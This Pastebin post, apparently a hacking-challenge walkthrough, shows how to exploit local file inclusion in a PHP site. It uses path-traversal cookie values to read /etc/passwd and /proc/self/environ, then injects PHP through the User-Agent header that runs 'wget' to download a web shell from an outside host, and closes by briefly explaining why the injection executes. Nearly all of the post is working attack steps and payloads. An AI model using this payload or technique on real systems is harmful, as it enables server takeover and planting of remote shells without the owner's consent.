Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- The challenge was to shell the site and upload a file in /AnonGuy
- If you see the screenshot http://prntscr.com/6usqux , you'll see that index.php is vulnerable to LFI (Local File Inclusion )
- Let's set the cookie AnonGuy to ../../../etc/passwd ~ http://prntscr.com/6vbeeq - Great :D
- Let's check out ../../../proc/self/environ ;) ~ http://prntscr.com/6vbhd5 - Fantastic 3:)
- Let's Try Setting The ..
- Cookie to : ../../../proc/self/environ
- and The User-Agent to : <?PHP system('wget http://pastebin.com/raw.php?i=Yun9UDBz -O shellwa.php'); ?>
- Ta-Da !! http://prntscr.com/6vbk5v :D Now All You Have To Do Is Upload A File In /AnonGuy :3
- O.o Why This Happens? o.O
- Notice That When We Visit /proc/self/environ With Our Default User-Agent It Shows That On The Page http://prntscr.com/6vbfjs 3:)
- Try Using This <?PHP echo "~ AnonGuy"; ?> As Your User-Agent ~ http://prntscr.com/6vbmvn You See What Happened :D
- Conclusion ~ If We Use A PHP Code As Our User-Agent *while accessing /proc/self/environ* - It Runs/Executes It :))
- ~ AnonGuy
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement